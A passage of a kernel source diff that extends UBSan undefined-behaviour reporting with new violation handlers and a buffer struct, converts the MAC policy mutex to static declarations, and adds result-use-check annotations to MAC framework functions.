((uintptr_t)ptr & (alignment - 1))) { //misaligned pointer use - n += scnprintf(buf + n, sz - n, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", kind, (void*)v->lhs, v->align->ty->name); - n += scnprintf(buf + n, sz - n, "required_alignment:%d, ", 1 << v->align->align); + 
ubsan_buf_log(ub, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", + kind, (void*)v->lhs, v->align->ty->name); + ubsan_buf_log(ub, "required_alignment:%d", 1 << v->align->align); } else { //insufficient object size - n += scnprintf(buf + n, sz - n, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p, ", + ubsan_buf_log(ub, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p", kind, v->align->ty->name, ptr); } - - return n; } -static size_t -format_oob(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_oob(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; struct san_type_desc *aty = v->oob->array_ty; struct san_type_desc *ity = v->oob->index_ty; uintptr_t idx = v->lhs; - n += scnprintf(buf + n, sz - n, "problem:\"OOB array access\", "); - n += scnprintf(buf + n, sz - n, "idx:%ld, ", idx); - n += scnprintf(buf + n, sz - n, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width); - n += scnprintf(buf + n, sz - n, "ity:\"%s\", isigned:%d, iwidth:%d, ", ity->name, ity->issigned, 1 << ity->width); + ubsan_buf_log(ub, "problem:\"OOB array access\", "); + ubsan_buf_log(ub, "idx:%ld, ", idx); + ubsan_buf_log(ub, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width); + ubsan_buf_log(ub, "ity:\"%s\", isigned:%d, iwidth:%d", ity->name, ity->issigned, 1 << ity->width); +} - return n; +static void +format_nullability_arg(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_nullability_arg_desc *data = v->nonnull_arg; + + const int arg_index = data->arg_index; + const char *attr_type = v->lhs ? 
"nonnull attribute" : "_Nonnull annotation"; + + ubsan_buf_log(ub, "problem:\"null in argument %d declared with %s\", ", arg_index, attr_type); + ubsan_buf_log_loc(ub, "declared", &data->attr_loc); } -static size_t -format_load_invalid_value(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_nonnull_return(struct ubsan_violation *v, struct ubsan_buf *ub) { - return scnprintf(buf, sz, "problem:\"invalid value load\", type:\"%s\", value:0x%llx", - v->invalid->type->name, v->lhs); + struct san_src_loc *declaration = (struct san_src_loc *)v->rhs; + const char *return_type = v->lhs ? "returns_nonnull attribute" : "_Nonnull return type annotation"; + + ubsan_buf_log(ub, "problem:\"null returned from function declared with %s\", ", return_type); + ubsan_buf_log_loc(ub, "declared", declaration); } -size_t -ubsan_format(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_load_invalid_value(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = scnprintf(buf, sz, "{ "); + ubsan_buf_log(ub, "problem:\"invalid value load\", type:\"%s\", value:0x%llx", + v->invalid->type->name, v->lhs); +} + +static void +format_missing_return(struct ubsan_violation *v __unused, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "problem:\"no value returned from value-returning function\""); +} + +static void +format_float_cast_overflow(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_float_desc *data = v->flt; + /* + * Cannot print out offending value (e.g. using %A, %f and so on) as kernel logging + * does not support float types (yet). 
+ */ + ubsan_buf_log(ub, "problem:\"%s type value outside the range of %s\"", + data->type_from->name, data->type_to->name); +} + +static const char * +get_implicit_conv_type(unsigned char kind) +{ + static const char * const conv_types[] = { + "integer truncation", + "unsigned integer truncation", + "signed integer truncation", + "integer sign change", + "signed integer truncation or sign change" + }; + static const size_t conv_types_cnt = sizeof(conv_types) / sizeof(conv_types[0]); + + return kind < conv_types_cnt ? conv_types[kind] : "unknown implicit integer conversion"; +} + +static void +format_implicit_conversion(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_implicit_conv_desc *data = v->implicit; + struct san_type_desc *from = data->type_from; + struct san_type_desc *to = data->type_to; + + ubsan_buf_log(ub, "problem:\"%s\", ", get_implicit_conv_type(data->kind)); + ubsan_buf_log(ub, "src value:%#llx type:\"%s\", signed:%d, width:%d, ", + v->lhs, from->name, from->issigned, 1 << from->width); + ubsan_buf_log(ub, "dst value:%#llx type:\"%s\", signed:%d, width:%d", + v->rhs, to->name, to->issigned, 1 << to->width); +} + +static void +format_function_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_func_type_mismatch_desc *data = v->func_mismatch; + ubsan_buf_log(ub, "problem:\"indirect function call through %p of a wrong type %s\"", + (void *)v->lhs, data->type->name); +} + +static void +format_vla_bound_not_positive(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_vla_bound_desc *data = v->vla_bound; + ubsan_buf_log(ub, "problem:\"VLA %s bound %#llx not positive\"", data->type->name, v->lhs); +} + +static void +format_invalid_builtin(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "problem:\"passing invalid zero argument to %s\"", + v->invalid_builtin->kind == 0 ? 
"ctz()" : "clz()"); +} + +void +ubsan_format(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "{ "); switch (v->ubsan_type) { case UBSAN_OVERFLOW_add ... UBSAN_OVERFLOW_negate: - n += format_overflow(v, buf + n, sz - n); + format_overflow(v, ub); break; case UBSAN_UNREACHABLE: - n += scnprintf(buf + n, sz - n, "problem:\"unreachable\", "); + ubsan_buf_log(ub, "problem:\"unreachable\""); break; case UBSAN_SHIFT: - n += format_shift(v, buf + n, sz - n); + format_shift(v, ub); break; case UBSAN_TYPE_MISMATCH: - n += format_type_mismatch(v, buf + n, sz - n); + format_type_mismatch(v, ub); break; case UBSAN_POINTER_OVERFLOW: - n += scnprintf(buf + n, sz - n, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx, ", v->lhs, v->rhs); + ubsan_buf_log(ub, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx", v->lhs, v->rhs); break; case UBSAN_OOB: - n += format_oob(v, buf + n, sz - n); + format_oob(v, ub); break; - case UBSAN_LOAD_INVALID_VALUE: - n += format_load_invalid_value(v, buf + n, sz - n); + case UBSAN_NULLABILITY_ARG: + format_nullability_arg(v, ub); + break; + case UBSAN_NULLABILITY_RETURN: + format_nonnull_return(v, ub); + break; + case UBSAN_MISSING_RETURN: + format_missing_return(v, ub); + break; + case UBSAN_FLOAT_CAST_OVERFLOW: + format_float_cast_overflow(v, ub); + break; + case UBSAN_IMPLICIT_CONVERSION: + format_implicit_conversion(v, ub); break; - case UBSAN_GENERIC: - n += scnprintf(buf + n, sz - n, "problem:\"generic\", function:\"%s\", ", v->func); + case UBSAN_FUNCTION_TYPE_MISMATCH: + format_function_type_mismatch(v, ub); + break; + case UBSAN_VLA_BOUND_NOT_POSITIVE: + format_vla_bound_not_positive(v, ub); + break; + case UBSAN_INVALID_BUILTIN: + format_invalid_builtin(v, ub); + break; + case UBSAN_LOAD_INVALID_VALUE: + format_load_invalid_value(v, ub); break; default: panic("unknown violation"); } - n += format_loc(v->loc, buf + n, sz - n); - - return n; + ubsan_buf_log_loc(ub, ", found", v->loc); + 
ubsan_buf_log(ub, " },\n"); } enum UBFatality { Fatal, FleshWound }; @@ -212,10 +330,13 @@ ubsan_handle(struct ubsan_violation *v, enum UBFatality fatality) ubsan_log_append(v); if (ubsan_print || (fatality == Fatal)) { - const size_t sz = 256; - static char buf[sz]; - buf[0] = '\0'; - ubsan_format(v, buf, sz); + static char buf[256] = { 0 }; + struct ubsan_buf ubsan_buf = { + .ub_logged = 0, + .ub_buf_size = sizeof(buf), + .ub_buf = buf + }; + ubsan_format(v, &ubsan_buf); printf("UBSan: %s", buf); } } @@ -299,6 +420,146 @@ __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *desc, uint64_t idx) ubsan_handle(&v, Fatal); } +void +__ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct 
san_src_loc *)declaration }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_missing_return(struct ubsan_missing_ret_desc *desc) +{ + struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *desc) +{ + struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_float_cast_overflow(struct ubsan_float_desc *desc, uint64_t value) +{ + struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *desc, uint64_t value) +{ + struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to) +{ + struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to) +{ + struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void 
+__ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc *desc, uint64_t func) +{ + struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *desc, uint64_t func) +{ + struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *desc, uint64_t length) +{ + struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *desc, uint64_t length) +{ + struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *desc) +{ + struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *desc) +{ + struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *desc, uint64_t invalid_value) { @@ -312,26 +573,3 @@ __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *desc, ui struct ubsan_violation v = { UBSAN_LOAD_INVALID_VALUE, invalid_value, 0, .invalid = desc, &desc->loc }; ubsan_handle(&v, Fatal); } - -#define DEFINE_GENERIC(check) \ - void __ubsan_handle_##check (struct san_src_loc* loc) \ - { \ - struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \ - ubsan_handle(&v, FleshWound); \ - } \ - void __ubsan_handle_##check##_abort(struct 
san_src_loc* loc) \ - { \ - struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \ - ubsan_handle(&v, Fatal); \ - } - -DEFINE_GENERIC(invalid_builtin) -DEFINE_GENERIC(nonnull_arg) -DEFINE_GENERIC(vla_bound_not_positive) -DEFINE_GENERIC(float_cast_overflow) -DEFINE_GENERIC(function_type_mismatch) -DEFINE_GENERIC(missing_return) -DEFINE_GENERIC(nonnull_return) -DEFINE_GENERIC(nullability_arg) -DEFINE_GENERIC(nullability_return) -DEFINE_GENERIC(implicit_conversion) diff --git a/san/ubsan.h b/san/ubsan.h index e24045ab2..36dc50c22 100644 --- a/san/ubsan.h +++ b/san/ubsan.h @@ -89,6 +89,48 @@ struct ubsan_load_invalid_desc { struct san_type_desc *type; }; +struct ubsan_nullability_arg_desc { + struct san_src_loc loc; + struct san_src_loc attr_loc; + int arg_index; +}; + +struct ubsan_nullability_ret_desc { + struct san_src_loc loc; +}; + +struct ubsan_missing_ret_desc { + struct san_src_loc loc; +}; + +struct ubsan_float_desc { + struct san_src_loc loc; + struct san_type_desc *type_from; + struct san_type_desc *type_to; +}; + +struct ubsan_implicit_conv_desc { + struct san_src_loc loc; + struct san_type_desc *type_from; + struct san_type_desc *type_to; + unsigned char kind; +}; + +struct ubsan_func_type_mismatch_desc { + struct san_src_loc loc; + struct san_type_desc *type; +}; + +struct ubsan_vla_bound_desc { + struct san_src_loc loc; + struct san_type_desc *type; +}; + +struct ubsan_invalid_builtin { + struct san_src_loc loc; + unsigned char kind; +}; + enum { UBSAN_OVERFLOW_add = 1, UBSAN_OVERFLOW_sub, @@ -100,10 +142,17 @@ enum { UBSAN_ALIGN, UBSAN_POINTER_OVERFLOW, UBSAN_OOB, - UBSAN_GENERIC, UBSAN_TYPE_MISMATCH, UBSAN_LOAD_INVALID_VALUE, - UBSAN_VIOLATION_MAX, + UBSAN_NULLABILITY_ARG, + UBSAN_NULLABILITY_RETURN, + UBSAN_MISSING_RETURN, + UBSAN_FLOAT_CAST_OVERFLOW, + UBSAN_IMPLICIT_CONVERSION, + UBSAN_FUNCTION_TYPE_MISMATCH, + UBSAN_VLA_BOUND_NOT_POSITIVE, + UBSAN_INVALID_BUILTIN, + UBSAN_VIOLATION_MAX }; struct ubsan_violation { @@ -118,13 
+167,27 @@ struct ubsan_violation { struct ubsan_ptroverflow_desc *ptroverflow; struct ubsan_oob_desc *oob; struct ubsan_load_invalid_desc *invalid; + struct ubsan_nullability_arg_desc *nonnull_arg; + struct ubsan_nullability_ret_desc *nonnull_ret; + struct ubsan_missing_ret_desc *missing_ret; + struct ubsan_float_desc *flt; + struct ubsan_implicit_conv_desc *implicit; + struct ubsan_func_type_mismatch_desc *func_mismatch; + struct ubsan_vla_bound_desc *vla_bound; + struct ubsan_invalid_builtin *invalid_builtin; const char *func; }; struct san_src_loc *loc; }; +struct ubsan_buf { + size_t ub_logged; + size_t ub_buf_size; + char *ub_buf; +}; + void ubsan_log_append(struct ubsan_violation *); -size_t ubsan_format(struct ubsan_violation *, char *buf, size_t sz); +void ubsan_format(struct ubsan_violation *, struct ubsan_buf *); /* * UBSan ABI @@ -135,10 +198,30 @@ void __ubsan_handle_add_overflow_abort(struct ubsan_overflow_desc *, uint64_t lh void __ubsan_handle_builtin_unreachable(struct ubsan_unreachable_desc *); void __ubsan_handle_divrem_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_divrem_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); +void __ubsan_handle_float_cast_overflow(struct ubsan_float_desc *, uint64_t); +void __ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *, uint64_t); +void __ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc*, uint64_t); +void __ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *, uint64_t); +void __ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t); +void __ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t); +void __ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *); +void __ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *); +void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc 
*, uint64_t); +void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t); +void __ubsan_handle_missing_return(struct ubsan_missing_ret_desc *); +void __ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *); void __ubsan_handle_mul_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_mul_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_negate_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_negate_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); +void __ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t); void __ubsan_handle_out_of_bounds(struct ubsan_oob_desc *, uint64_t idx); void __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *, uint64_t idx); void __ubsan_handle_pointer_overflow(struct ubsan_ptroverflow_desc *, uint64_t lhs, uint64_t rhs); @@ -149,29 +232,7 @@ void __ubsan_handle_sub_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uin void __ubsan_handle_sub_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_type_mismatch_v1(struct ubsan_align_desc *, uint64_t val); void __ubsan_handle_type_mismatch_v1_abort(struct ubsan_align_desc *, uint64_t val); -void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, 
uint64_t); -void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t); - -/* currently unimplemented */ -void __ubsan_handle_float_cast_overflow(struct san_src_loc *); -void __ubsan_handle_float_cast_overflow_abort(struct san_src_loc *); -void __ubsan_handle_function_type_mismatch(struct san_src_loc *); -void __ubsan_handle_function_type_mismatch_abort(struct san_src_loc *); -void __ubsan_handle_implicit_conversion(struct san_src_loc *); -void __ubsan_handle_implicit_conversion_abort(struct san_src_loc *); -void __ubsan_handle_invalid_builtin(struct san_src_loc *); -void __ubsan_handle_invalid_builtin_abort(struct san_src_loc *); -void __ubsan_handle_missing_return(struct san_src_loc *); -void __ubsan_handle_missing_return_abort(struct san_src_loc *); -void __ubsan_handle_nonnull_arg(struct san_src_loc *); -void __ubsan_handle_nonnull_arg_abort(struct san_src_loc *); -void __ubsan_handle_nonnull_return(struct san_src_loc *); -void __ubsan_handle_nonnull_return_abort(struct san_src_loc *); -void __ubsan_handle_nullability_arg(struct san_src_loc *); -void __ubsan_handle_nullability_arg_abort(struct san_src_loc *); -void __ubsan_handle_nullability_return(struct san_src_loc *); -void __ubsan_handle_nullability_return_abort(struct san_src_loc *); -void __ubsan_handle_vla_bound_not_positive(struct san_src_loc *); -void __ubsan_handle_vla_bound_not_positive_abort(struct san_src_loc *); +void __ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *, uint64_t); +void __ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *, uint64_t); #endif /* _UBSAN_H_ */ diff --git a/san/ubsan_log.c b/san/ubsan_log.c index 0c77d4ce9..aedd9f94e 100644 --- a/san/ubsan_log.c +++ b/san/ubsan_log.c @@ -111,24 +111,26 @@ sysctl_ubsan_log_dump SYSCTL_HANDLER_ARGS os_atomic_thread_fence(seq_cst); tail = os_atomic_load(&ubsan_log_tail, relaxed); - char *buf; - size_t n = 0; - int err; - if (tail == head) { return 0; /* log is empty */ } - 
buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO); + char *buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO); if (!buf) { return 0; } + struct ubsan_buf ubsan_buf = { + .ub_logged = 0, + .ub_buf_size = sz, + .ub_buf = buf + }; + for (size_t i = tail; i != head; i = next_entry(i)) { - n += ubsan_format(&ubsan_log[i], buf + n, sz - n); + ubsan_format(&ubsan_log[i], &ubsan_buf); } - err = SYSCTL_OUT(req, buf, n); + int err = SYSCTL_OUT(req, buf, ubsan_buf.ub_logged); kheap_free(KHEAP_TEMP, buf, sz); return err; diff --git a/security/mac_base.c b/security/mac_base.c index dd3da27a1..7ac90d164 100644 --- a/security/mac_base.c +++ b/security/mac_base.c @@ -122,7 +122,7 @@ #if CONFIG_MACF SYSCTL_NODE(, OID_AUTO, security, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Security Controls"); -SYSCTL_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "TrustedBSD MAC policy controls"); /* @@ -240,7 +240,8 @@ SYSCTL_UINT(_security_mac, OID_AUTO, vnode_enforce, SECURITY_MAC_CTLFLAGS, * For a few special operations involving a change to the list of * active policies, the mtx itself must be held. */ -static lck_mtx_t *mac_policy_mtx; +static LCK_GRP_DECLARE(mac_lck_grp, "MAC lock"); +static LCK_MTX_DECLARE(mac_policy_mtx, &mac_lck_grp); /* * Policy list array allocation chunk size. Each entry holds a pointer. 
@@ -269,11 +270,11 @@ struct mac_label_element_list_t mac_static_label_element_list; static __inline void mac_policy_grab_exclusive(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); while (mac_policy_busy != 0) { - lck_mtx_sleep(mac_policy_mtx, LCK_SLEEP_UNLOCK, + lck_mtx_sleep(&mac_policy_mtx, LCK_SLEEP_UNLOCK, (event_t)&mac_policy_busy, THREAD_UNINT); - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); } } @@ -282,16 +283,16 @@ mac_policy_release_exclusive(void) { KASSERT(mac_policy_busy == 0, ("mac_policy_release_exclusive(): not exclusive")); - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); thread_wakeup((event_t) &mac_policy_busy); } void mac_policy_list_busy(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); mac_policy_busy++; - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); } int @@ -303,27 +304,27 @@ mac_policy_list_conditional_busy(void) return 0; } - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); if (mac_policy_list.numloaded > mac_policy_list.staticmax) { mac_policy_busy++; ret = 1; } else { ret = 0; } - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); return ret; } void mac_policy_list_unbusy(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); mac_policy_busy--; KASSERT(mac_policy_busy >= 0, ("MAC_POLICY_LIST_LOCK")); if (mac_policy_busy == 0) { thread_wakeup(&mac_policy_busy); } - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); } /* @@ -332,10 +333,6 @@ mac_policy_list_unbusy(void) void mac_policy_init(void) { - lck_grp_attr_t *mac_lck_grp_attr; - lck_attr_t *mac_lck_attr; - lck_grp_t *mac_lck_grp; - mac_policy_list.numloaded = 0; mac_policy_list.max = MAC_POLICY_LIST_CHUNKSIZE; mac_policy_list.maxindex = 0; @@ -353,15 +350,6 @@ mac_policy_init(void) LIST_INIT(&mac_label_element_list); LIST_INIT(&mac_static_label_element_list); - - mac_lck_grp_attr = lck_grp_attr_alloc_init(); - 
mac_lck_grp = lck_grp_alloc_init("MAC lock", mac_lck_grp_attr); - mac_lck_attr = lck_attr_alloc_init(); - lck_attr_setdefault(mac_lck_attr); - mac_policy_mtx = lck_mtx_alloc_init(mac_lck_grp, mac_lck_attr); - lck_attr_free(mac_lck_attr); - lck_grp_attr_free(mac_lck_grp_attr); - lck_grp_free(mac_lck_grp); } /* Function pointer set up for loading security extensions. diff --git a/security/mac_framework.h b/security/mac_framework.h index 5a30437a0..ed331a65d 100644 --- a/security/mac_framework.h +++ b/security/mac_framework.h @@ -121,6 +121,7 @@ struct vnode; struct vnode_attr; struct vop_setlabel_args; +#include #include #include @@ -142,16 +143,16 @@ typedef struct OSObject *io_object_t; /*@ === */ int mac_audit_check_postselect(kauth_cred_t cred, unsigned short syscode, - void *args, int error, int retval, int mac_forced); + void *args, int error, int retval, int mac_forced) __result_use_check; int mac_audit_check_preselect(kauth_cred_t cred, unsigned short syscode, - void *args); + void *args) __result_use_check; int mac_cred_check_label_update(kauth_cred_t cred, - struct label *newlabel); + struct label *newlabel) __result_use_check; int mac_cred_check_label_update_execve(vfs_context_t ctx, struct vnode *vp, off_t offset, struct vnode *scriptvp, struct label *scriptvnodelabel, struct label *execlabel, - proc_t proc, void *macextensions); -int mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2); + proc_t proc, void *macextensions) __result_use_check; +int mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2) __result_use_check; struct label *mac_cred_label_alloc(void); void mac_cred_label_associate(kauth_cred_t cred_parent, kauth_cred_t cred_child); @@ -159,10 +160,11 @@ void mac_cred_label_associate_fork(kauth_cred_t cred, proc_t child); void mac_cred_label_associate_kernel(kauth_cred_t cred); void mac_cred_label_associate_user(kauth_cred_t cred); void mac_cred_label_destroy(kauth_cred_t cred); -int mac_cred_label_externalize_audit(proc_t p, struct mac 
*mac); +int mac_cred_label_externalize_audit(proc_t p, struct mac *mac) __result_use_check; void mac_cred_label_free(struct label *label); void mac_cred_label_init(kauth_cred_t cred); -int mac_cred_label_compare(struct label *a, struct label *b); +bool mac_cred_label_is_equal(const struct label *a, const struct label *b) __result_use_check; +uint32_t mac_cred_label_hash_update(const struct label *a, uint32_t hash); void mac_cred_label_update(kauth_cred_t cred, struct label *newlabel); void mac_cred_label_update_execve(vfs_context_t ctx, kauth_cred_t newcred, struct vnode *vp, off_t offset, struct vnode *scriptvp, @@ -177,93 +179,94 @@ void mac_devfs_label_destroy(struct devnode *de); void mac_devfs_label_init(struct devnode *de); void mac_devfs_label_update(struct mount *mp, struct devnode *de, struct vnode *vp); -int mac_execve_enter(user_addr_t mac_p, struct image_params *imgp); -int mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg); -int mac_file_check_create(kauth_cred_t cred); -int mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd); +int mac_execve_enter(user_addr_t mac_p, struct image_params *imgp) __result_use_check; +int mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check; +int mac_file_check_create(kauth_cred_t cred) __result_use_check; +int mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd) __result_use_check; int mac_file_check_fcntl(kauth_cred_t cred, struct fileglob *fg, int cmd, - user_long_t arg); + user_long_t arg) __result_use_check; int mac_file_check_get(kauth_cred_t cred, struct fileglob *fg, - char *elements, size_t len); -int mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg); -int mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg); + char *elements, size_t len) __result_use_check; +int mac_file_check_get_offset(kauth_cred_t cred, 